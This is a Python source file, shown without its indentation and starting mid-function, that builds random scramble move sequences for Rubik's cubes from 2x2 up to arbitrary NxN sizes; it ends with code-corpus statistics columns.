turns = [" ","2 ","' ","2 "]
scramble = []
usedmoves=[]
usedmoves1=[]
for i in range(20):
if i % 2 ==0:
randmoves=random.choice(moves)
if i==0:
while randmoves=="F":
randmoves=random.choice(moves)
elif i>1:
while randmoves=="F" and scramble[-4]=="F" and scramble[-2]=="B":
randmoves=random.choice(moves)
while randmoves=="B" and scramble[-4]=="B" and scramble[-2]=="F":
randmoves=random.choice(moves)
while randmoves=="R" and scramble[-4]=="R" and scramble[-2]=="L":
randmoves=random.choice(moves)
while randmoves=="L" and scramble[-4]=="L" and scramble[-2]=="R":
randmoves=random.choice(moves)
while randmoves=="U" and scramble[-4]=="U" and scramble[-2]=="D":
randmoves=random.choice(moves)
while randmoves=="D" and scramble[-4]=="D" and scramble[-2]=="U":
randmoves=random.choice(moves)
usedmoves.append(randmoves)
scramble.append(randmoves)
scramble.append(random.choice(turns))
moves.remove(randmoves)
if i != 0:
moves.append(usedmoves1[-1])
else:
randmoves1=random.choice(moves)
if i==1:
while scramble[-2]=="B" and randmoves1=="F":
randmoves1=random.choice(moves)
elif i>1:
while randmoves1=="F" and scramble[-4]=="F" and scramble[-2]=="B":
randmoves1=random.choice(moves)
while randmoves=="B" and scramble[-4]=="B" and scramble[-2]=="F":
randmoves1=random.choice(moves)
while randmoves1=="R" and scramble[-4]=="R" and scramble[-2]=="L":
randmoves1=random.choice(moves)
while randmoves1=="L" and scramble[-4]=="L" and scramble[-2]=="R":
randmoves1=random.choice(moves)
while randmoves1=="U" and scramble[-4]=="U" and scramble[-2]=="D":
randmoves1=random.choice(moves)
while randmoves1=="D" and scramble[-4]=="D" and scramble[-2]=="U":
randmoves1=random.choice(moves)
scramble.append(randmoves1)
usedmoves1.append(randmoves1)
scramble.append(random.choice(turns))
moves.remove(randmoves1)
moves.append(usedmoves[-1])
return "".join(scramble)
a=main_scram().split()
list1=["F","F2","F'","B'","B2","B"]
list2=["R2","R","R'","L","L'","L2"]
list3=["F","F2","F'"]
list4=["R2","R","R'"]
times=0
while (a[0] in list1 and a[1] in list1) or (a[0] in list3) or (a[-1] in list2 and a[-2] in list2) or (a[-1] in list4):
if times>3:
a=main_scram.split()
times=0
if a[0] in list3:
a.remove(a[0])
times+=1
if (a[0] in list1 and a[1] in list1):
if a[0] not in list3:
a.remove(a[1])
times+=1
if a[-1] in list4:
a.remove(a[-1])
times+=1
if (a[-1] in list2 and a[-2] in list2):
if a[-1] not in list4:
a.remove(a[-2])
times+=1
scramble="R' U' F " + " ".join(a) + " R' U' F"
return scramble
def get1():
moves = ["x","y","z"]
turns = [" ","2 ","' "]
scramble = []
usedmoves=[]
usedmoves1=[]
for i in range(8):
if i % 2 ==0:
randmoves=random.choice(moves)
usedmoves.append(randmoves)
scramble.append(randmoves)
scramble.append(random.choice(turns))
moves.remove(randmoves)
if i != 0:
moves.append(usedmoves1[-1])
else:
randmoves1=random.choice(moves)
scramble.append(randmoves1)
usedmoves1.append(randmoves1)
scramble.append(random.choice(turns))
moves.remove(randmoves1)
moves.append(usedmoves[-1])
return "".join(scramble)
def get2():
moves = ["F","R","U"]
turns = [" ","2 ","' ","2 "]
scramble = []
usedmoves=[]
usedmoves1=[]
for i in range(10):
if i % 2 ==0:
randmoves=random.choice(moves)
usedmoves.append(randmoves)
scramble.append(randmoves)
scramble.append(random.choice(turns))
moves.remove(randmoves)
if i != 0:
moves.append(usedmoves1[-1])
else:
randmoves1=random.choice(moves)
scramble.append(randmoves1)
usedmoves1.append(randmoves1)
scramble.append(random.choice(turns))
moves.remove(randmoves1)
moves.append(usedmoves[-1])
return "".join(scramble)
def get3():
moves = ["F","B","R","L","U","D"]
turns = [" ","2 ","' ","2 "]
scramble = []
usedmoves=[]
usedmoves1=[]
for i in range(20):
if i % 2 ==0:
randmoves=random.choice(moves)
if i>1:
while randmoves=="F" and scramble[-4]=="F" and scramble[-2]=="B":
randmoves=random.choice(moves)
while randmoves=="B" and scramble[-4]=="B" and scramble[-2]=="F":
randmoves=random.choice(moves)
while randmoves=="R" and scramble[-4]=="R" and scramble[-2]=="L":
randmoves=random.choice(moves)
while randmoves=="L" and scramble[-4]=="L" and scramble[-2]=="R":
randmoves=random.choice(moves)
while randmoves=="U" and scramble[-4]=="U" and scramble[-2]=="D":
randmoves=random.choice(moves)
while randmoves=="D" and scramble[-4]=="D" and scramble[-2]=="U":
randmoves=random.choice(moves)
usedmoves.append(randmoves)
scramble.append(randmoves)
if i<=4:
ok=random.randint(1,3)
if ok!=1:
scramble.append("2 ")
else:
scramble.append(random.choice(turns))
else:
scramble.append(random.choice(turns))
moves.remove(randmoves)
if i != 0:
moves.append(usedmoves1[-1])
else:
randmoves1=random.choice(moves)
if i>1:
while randmoves1=="F" and scramble[-4]=="F" and scramble[-2]=="B":
randmoves1=random.choice(moves)
while randmoves=="B" and scramble[-4]=="B" and scramble[-2]=="F":
randmoves1=random.choice(moves)
while randmoves1=="R" and scramble[-4]=="R" and scramble[-2]=="L":
randmoves1=random.choice(moves)
while randmoves1=="L" and scramble[-4]=="L" and scramble[-2]=="R":
randmoves1=random.choice(moves)
while randmoves1=="U" and scramble[-4]=="U" and scramble[-2]=="D":
randmoves1=random.choice(moves)
while randmoves1=="D" and scramble[-4]=="D" and scramble[-2]=="U":
randmoves1=random.choice(moves)
scramble.append(randmoves1)
usedmoves1.append(randmoves1)
scramble.append(random.choice(turns))
moves.remove(randmoves1)
moves.append(usedmoves[-1])
return "".join(scramble)
def get4():
moves = ["F","B","R","L","U","D"]
wide_turns=["F","Fw","B","R","Rw","L","D","U","Uw"]
turns = [" ","2 ","' ","2 "]
scramble = []
usedmoves=[]
usedmoves1=[]
list1=["F","B","Fw"]
list2=["R","L","Rw"]
list3=["D","U","Uw"]
for i in range(20):
if i % 2 ==0:
randmoves=random.choice(moves)
if i>1:
while randmoves=="F" and scramble[-4]=="F" and scramble[-2]=="B":
randmoves=random.choice(moves)
while randmoves=="B" and scramble[-4]=="B" and scramble[-2]=="F":
randmoves=random.choice(moves)
while randmoves=="R" and scramble[-4]=="R" and scramble[-2]=="L":
randmoves=random.choice(moves)
while randmoves=="L" and scramble[-4]=="L" and scramble[-2]=="R":
randmoves=random.choice(moves)
while randmoves=="U" and scramble[-4]=="U" and scramble[-2]=="D":
randmoves=random.choice(moves)
while randmoves=="D" and scramble[-4]=="D" and scramble[-2]=="U":
randmoves=random.choice(moves)
usedmoves.append(randmoves)
scramble.append(randmoves)
if i<=4:
ok=random.randint(1,3)
if ok!=1:
scramble.append("2 ")
else:
scramble.append(random.choice(turns))
else:
scramble.append(random.choice(turns))
moves.remove(randmoves)
if i != 0:
moves.append(usedmoves1[-1])
else:
randmoves1=random.choice(moves)
if i>1:
while randmoves1=="F" and scramble[-4]=="F" and scramble[-2]=="B":
randmoves1=random.choice(moves)
while randmoves=="B" and scramble[-4]=="B" and scramble[-2]=="F":
randmoves1=random.choice(moves)
while randmoves1=="R" and scramble[-4]=="R" and scramble[-2]=="L":
randmoves1=random.choice(moves)
while randmoves1=="L" and scramble[-4]=="L" and scramble[-2]=="R":
randmoves1=random.choice(moves)
while randmoves1=="U" and scramble[-4]=="U" and scramble[-2]=="D":
randmoves1=random.choice(moves)
while randmoves1=="D" and scramble[-4]=="D" and scramble[-2]=="U":
randmoves1=random.choice(moves)
scramble.append(randmoves1)
usedmoves1.append(randmoves1)
scramble.append(random.choice(turns))
moves.remove(randmoves1)
moves.append(usedmoves[-1])
usedmoves=[]
usedmoves1=[]
wide_turns.remove(randmoves1)
usedmoves1.append(randmoves1)
for i in range(25):
if i % 2 ==0:
randmoves=random.choice(wide_turns)
if randmoves in moves and scramble[-2] in moves and scramble[-4] in moves:
randmoves=random.choice(wide_turns)
if (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3):
while randmoves==scramble[-4]:
randmoves=random.choice(moves)
while (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
randmoves=random.choice(wide_turns)
usedmoves.append(randmoves)
scramble.append(randmoves)
scramble.append(random.choice(turns))
wide_turns.remove(randmoves)
if i != 0:
wide_turns.append(usedmoves1[-1])
else:
randmoves1=random.choice(wide_turns)
if randmoves1 in moves and scramble[-2] in moves and scramble[-4] in moves:
randmoves1=random.choice(wide_turns)
if (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3):
while randmoves1==scramble[-4]:
randmoves1=random.choice(moves)
while (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3):
randmoves1=random.choice(wide_turns)
scramble.append(randmoves1)
usedmoves1.append(randmoves1)
scramble.append(random.choice(turns))
wide_turns.remove(randmoves1)
wide_turns.append(usedmoves[-1])
return "".join(scramble)
def get5():
moves = ["F","Fw","B","Bw","R","Rw","L","Lw","D","Dw","U","Uw"]
turns = [" ","2 ","' "]
scramble = []
usedmoves=[]
usedmoves1=[]
list1=["U","D","Uw","Dw"]
list2=["R","L","Lw","Rw"]
list3=["F","B","Fw","Bw"]
for i in range(60):
if i % 2 ==0:
randmoves=random.choice(moves)
if i>1:
if (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3):
while randmoves==scramble[-4]:
randmoves=random.choice(moves)
if i > 2:
while (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
randmoves=random.choice(moves)
usedmoves.append(randmoves)
scramble.append(randmoves)
scramble.append(random.choice(turns))
moves.remove(randmoves)
if i != 0:
moves.append(usedmoves1[-1])
else:
randmoves1=random.choice(moves)
if i>2:
randmoves1=random.choice(moves)
if (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3):
while randmoves1==scramble[-4]:
randmoves1=random.choice(moves)
while (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
randmoves1=random.choice(moves)
scramble.append(randmoves1)
usedmoves1.append(randmoves1)
scramble.append(random.choice(turns))
moves.remove(randmoves1)
moves.append(usedmoves[-1])
return "".join(scramble)
def get6():
moves = ["F","Fw","B","Bw","R","Rw","L","Lw","D","Dw","U","Uw","3Uw","3Rw","3Fw"]
turns = [" ","2 ","' "]
scramble = []
usedmoves=[]
usedmoves1=[]
list1=["U","D","Uw","Dw","3Uw"]
list2=["R","L","Lw","Rw","3Rw"]
list3=["F","B","Fw","Bw","3Fw"]
for i in range(80):
if i % 2 ==0:
randmoves=random.choice(moves)
if i>1:
if (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3):
while randmoves==scramble[-4]:
randmoves=random.choice(moves)
if i>2:
while (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
randmoves=random.choice(moves)
usedmoves.append(randmoves)
scramble.append(randmoves)
scramble.append(random.choice(turns))
moves.remove(randmoves)
if i != 0:
moves.append(usedmoves1[-1])
else:
randmoves1=random.choice(moves)
if i>2:
randmoves1=random.choice(moves)
if (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3):
while randmoves1==scramble[-4]:
randmoves1=random.choice(moves)
while (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
randmoves1=random.choice(moves)
scramble.append(randmoves1)
usedmoves1.append(randmoves1)
scramble.append(random.choice(turns))
moves.remove(randmoves1)
moves.append(usedmoves[-1])
return "".join(scramble)
def get7():
moves = ["F","Fw","B","Bw","R","Rw","L","Lw","D","Dw","U","Uw","3Uw","3Rw","3Fw","3Bw","3Dw","3Lw"]
turns = [" ","2 ","' "]
scramble = []
usedmoves=[]
usedmoves1=[]
list1=["U","D","Uw","Dw","3Uw","3Dw"]
list2=["R","L","Lw","Rw","3Rw","3Lw"]
list3=["F","B","Fw","Bw","3Fw","3Bw"]
for i in range(100):
if i % 2 ==0:
randmoves=random.choice(moves)
if i>1:
if (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3):
while randmoves==scramble[-4]:
randmoves=random.choice(moves)
if i>2:
while (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
randmoves=random.choice(moves)
usedmoves.append(randmoves)
scramble.append(randmoves)
scramble.append(random.choice(turns))
moves.remove(randmoves)
if i != 0:
moves.append(usedmoves1[-1])
else:
randmoves1=random.choice(moves)
if i>2:
randmoves1=random.choice(moves)
if (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3):
while randmoves1==scramble[-4]:
randmoves1=random.choice(moves)
while (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
randmoves1=random.choice(moves)
scramble.append(randmoves1)
usedmoves1.append(randmoves1)
scramble.append(random.choice(turns))
moves.remove(randmoves1)
moves.append(usedmoves[-1])
return "".join(scramble)
def get8():
moves = ["F","Fw","B","Bw","R","Rw","L","Lw","D","Dw","U","Uw","3Uw","3Rw","3Fw","3Bw","3Dw","3Lw","4Uw","4Rw","4Fw"]
turns = [" ","2 ","' "]
scramble = []
usedmoves=[]
usedmoves1=[]
list1=["U","D","Uw","Dw","3Uw","3Dw","4Uw"]
list2=["R","L","Lw","Rw","3Rw","3Lw","4Rw"]
list3=["F","B","Fw","Bw","3Fw","3Bw","4Fw"]
for i in range(120):
if i % 2 ==0:
randmoves=random.choice(moves)
if i>1:
if (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3):
while randmoves==scramble[-4]:
randmoves=random.choice(moves)
if i>2:
while (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
randmoves=random.choice(moves)
usedmoves.append(randmoves)
scramble.append(randmoves)
scramble.append(random.choice(turns))
moves.remove(randmoves)
if i != 0:
moves.append(usedmoves1[-1])
else:
randmoves1=random.choice(moves)
if i>2:
randmoves1=random.choice(moves)
if (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3):
while randmoves1==scramble[-4]:
randmoves1=random.choice(moves)
while (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
randmoves1=random.choice(moves)
scramble.append(randmoves1)
usedmoves1.append(randmoves1)
scramble.append(random.choice(turns))
moves.remove(randmoves1)
moves.append(usedmoves[-1])
return "".join(scramble)
def get8():
moves = ["F","Fw","B","Bw","R","Rw","L","Lw","D","Dw","U","Uw","3Uw","3Rw","3Fw","3Bw","3Dw","3Lw","4Uw","4Rw","4Fw"]
turns = [" ","2 ","' "]
scramble = []
usedmoves=[]
usedmoves1=[]
list1=["U","D","Uw","Dw","3Uw","3Dw","4Uw"]
list2=["R","L","Lw","Rw","3Rw","3Lw","4Rw"]
list3=["F","B","Fw","Bw","3Fw","3Bw","4Fw"]
for i in range(120):
if i % 2 ==0:
randmoves=random.choice(moves)
if i>1:
if (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3):
while randmoves==scramble[-4]:
randmoves=random.choice(moves)
if i>2:
while (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
randmoves=random.choice(moves)
usedmoves.append(randmoves)
scramble.append(randmoves)
scramble.append(random.choice(turns))
moves.remove(randmoves)
if i != 0:
moves.append(usedmoves1[-1])
else:
randmoves1=random.choice(moves)
if i>2:
randmoves1=random.choice(moves)
if (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3):
while randmoves1==scramble[-4]:
randmoves1=random.choice(moves)
while (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
randmoves1=random.choice(moves)
scramble.append(randmoves1)
usedmoves1.append(randmoves1)
scramble.append(random.choice(turns))
moves.remove(randmoves1)
moves.append(usedmoves[-1])
return "".join(scramble)
def get9():
moves = ["F","Fw","B","Bw","R","Rw","L","Lw","D","Dw","U","Uw","3Uw","3Rw","3Fw","3Bw","3Dw","3Lw","4Uw","4Rw","4Fw","4Dw","4Lw","4Bw"]
turns = [" ","2 ","' "]
scramble = []
usedmoves=[]
usedmoves1=[]
list1=["U","D","Uw","Dw","3Uw","3Dw","4Uw","4Dw"]
list2=["R","L","Lw","Rw","3Rw","3Lw","4Rw","4Lw"]
list3=["F","B","Fw","Bw","3Fw","3Bw","4Fw","4Bw"]
for i in range(120):
if i % 2 ==0:
randmoves=random.choice(moves)
if i>1:
if (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3):
while randmoves==scramble[-4]:
randmoves=random.choice(moves)
if i>2:
while (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
randmoves=random.choice(moves)
usedmoves.append(randmoves)
scramble.append(randmoves)
scramble.append(random.choice(turns))
moves.remove(randmoves)
if i != 0:
moves.append(usedmoves1[-1])
else:
randmoves1=random.choice(moves)
if i>2:
randmoves1=random.choice(moves)
if (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3):
while randmoves1==scramble[-4]:
randmoves1=random.choice(moves)
while (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
randmoves1=random.choice(moves)
scramble.append(randmoves1)
usedmoves1.append(randmoves1)
scramble.append(random.choice(turns))
moves.remove(randmoves1)
moves.append(usedmoves[-1])
return "".join(scramble)
def get10():
moves = ["F","Fw","B","Bw","R","Rw","L","Lw","D","Dw","U","Uw","3Uw","3Rw","3Fw","3Bw","3Dw","3Lw","4Uw","4Rw","4Fw","4Dw","4Lw","4Bw","5Rw","5Fw","5Uw"]
turns = [" ","2 ","' "]
scramble = []
usedmoves=[]
usedmoves1=[]
list1=["U","D","Uw","Dw","3Uw","3Dw","4Uw","4Dw","5Uw"]
list2=["R","L","Lw","Rw","3Rw","3Lw","4Rw","4Lw","5Rw"]
list3=["F","B","Fw","Bw","3Fw","3Bw","4Fw","4Bw","5Fw"]
for i in range(120):
if i % 2 ==0:
randmoves=random.choice(moves)
if i>1:
if (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3):
while randmoves==scramble[-4]:
randmoves=random.choice(moves)
if i>2:
while (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
randmoves=random.choice(moves)
usedmoves.append(randmoves)
scramble.append(randmoves)
scramble.append(random.choice(turns))
moves.remove(randmoves)
if i != 0:
moves.append(usedmoves1[-1])
else:
randmoves1=random.choice(moves)
if i>2:
randmoves1=random.choice(moves)
if (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3):
while randmoves1==scramble[-4]:
randmoves1=random.choice(moves)
while (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
randmoves1=random.choice(moves)
scramble.append(randmoves1)
usedmoves1.append(randmoves1)
scramble.append(random.choice(turns))
moves.remove(randmoves1)
moves.append(usedmoves[-1])
return "".join(scramble)
def get11():
moves = ["F","Fw","B","Bw","R","Rw","L","Lw","D","Dw","U","Uw","3Uw","3Rw","3Fw","3Bw","3Dw","3Lw","4Uw","4Rw","4Fw","4Dw","4Lw","4Bw","5Rw","5Fw","5Uw","5Dw","5Lw","5Bw"]
turns = [" ","2 ","' "]
scramble = []
usedmoves=[]
usedmoves1=[]
list1=["U","D","Uw","Dw","3Uw","3Dw","4Uw","4Dw","5Uw","5Dw"]
list2=["R","L","Lw","Rw","3Rw","3Lw","4Rw","4Lw","5Rw","5Lw"]
list3=["F","B","Fw","Bw","3Fw","3Bw","4Fw","4Bw","5Fw","5Bw"]
for i in range(120):
if i % 2 ==0:
randmoves=random.choice(moves)
if i>1:
if (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3):
while randmoves==scramble[-4]:
randmoves=random.choice(moves)
if i>2:
while (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
randmoves=random.choice(moves)
usedmoves.append(randmoves)
scramble.append(randmoves)
scramble.append(random.choice(turns))
moves.remove(randmoves)
if i != 0:
moves.append(usedmoves1[-1])
else:
randmoves1=random.choice(moves)
if i>2:
randmoves1=random.choice(moves)
if (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3):
while randmoves1==scramble[-4]:
randmoves1=random.choice(moves)
while (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
randmoves1=random.choice(moves)
scramble.append(randmoves1)
usedmoves1.append(randmoves1)
scramble.append(random.choice(turns))
moves.remove(randmoves1)
moves.append(usedmoves[-1])
return "".join(scramble)
def get_big_cube(n=12):
moves = ["F","B","R","L","U","D","Uw","Dw","Fw","Bw","Rw","Lw"]
turns = [" ","2 ","' "]
moveslist = ["F","B","R","L","U","D"]
scramble = []
usedmoves=[]
usedmoves1=[]
ruf=["R","U","F"]
list1=["U","D","Uw","Dw"]
list2=["R","L","Lw","Rw"]
list3=["F","B","Fw","Bw"]
n1=int(n/2)
if n% 2==0:
times=int(n/2)
else:
times=int(n/2)+1
for i in range(3,times):
if n % 2==0:
for ru in ruf:
moves.append(f"{n1}{ru}w")
if ru=="R":
list2.append(f"{n1}{ru}w")
elif ru=="U":
list1.append(f"{n1}{ru}w")
elif ru=="F":
list3.append(f"{n1}{ru}w")
for move in moveslist:
moves.append(f"{i}{move}w")
if move=="U" or move=="D":
list1.append(f"{i}{move}w")
elif move=="R" or move=="L":
list2.append(f"{i}{move}w")
elif move=="B" or move=="F":
list3.append(f"{i}{move}w")
for i in range(n*15):
if i % 2 ==0:
randmoves=random.choice(moves)
if i>1:
if (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3):
while randmoves==scramble[-4]:
randmoves=random.choice(moves)
if i>2:
while (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
randmoves=random.choice(moves)
usedmoves.append(randmoves)
scramble.append(randmoves)
scramble.append(random.choice(turns))
moves.remove(randmoves)
if i != 0:
moves.append(usedmoves1[-1])
else:
randmoves1=random.choice(moves)
if i>2:
randmoves1=random.choice(moves)
if (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3):
while randmoves1==scramble[-4]:
randmoves1=random.choice(moves)
while (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
randmoves1=random.choice(moves)
scramble.append(randmoves1)
usedmoves1.append(randmoves1)
scramble.append(random.choice(turns))
moves.remove(randmoves1)
moves.append(usedmoves[-1])
return "".join(scramble)
| 44.83485
| 321
| 0.586606
| 4,725
| 34,478
| 4.276614
| 0.024127
| 0.203048
| 0.093829
| 0.084525
| 0.961004
| 0.952294
| 0.948929
| 0.937101
| 0.926511
| 0.920275
| 0
| 0.057842
| 0.254365
| 34,478
| 768
| 322
| 44.893229
| 0.728178
| 0
| 0
| 0.847892
| 0
| 0
| 0.033759
| 0
| 0.001506
| 0
| 0
| 0
| 0
| 1
| 0.02259
| false
| 0
| 0.001506
| 0
| 0.046687
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1db0d19c1bce670a67423a87f59f9ccad829d2fd
| 5,332
|
py
|
Python
|
timetable/migrations/0001_initial.py
|
Toluhunter/Timetable_management
|
2f7604fb09f23a2ff376b43d34eb92ad9fc726a1
|
[
"Apache-2.0"
